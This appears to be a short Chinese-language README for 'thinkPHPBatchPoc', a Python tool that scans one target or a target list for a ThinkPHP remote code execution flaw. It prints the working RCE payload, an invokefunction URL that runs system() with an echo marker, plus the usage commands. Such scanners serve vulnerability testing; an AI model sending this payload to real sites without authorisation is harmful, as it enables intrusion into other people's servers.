1 | PS E:\vulW3b> python .\thinkPHPBatchPoc.py |
thinkPHPBatchPoc
thinkPHPBatchPoc 是thinkPHP代码执行批量检测工具
工具所使用的payload
1 | ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20www_admintony_com |
工具使用方法
1 | PS E:\PyProject> python .\thinkPHPBatchPoc.py |
针对单个目标进行测试
1 | PS E:\PyProject> python .\thinkPHPBatchPoc.py -u admintony.com |
批量测试
1 | PS E:\PyProject> python .\thinkPHPBatchPoc.py -f .\target.txt |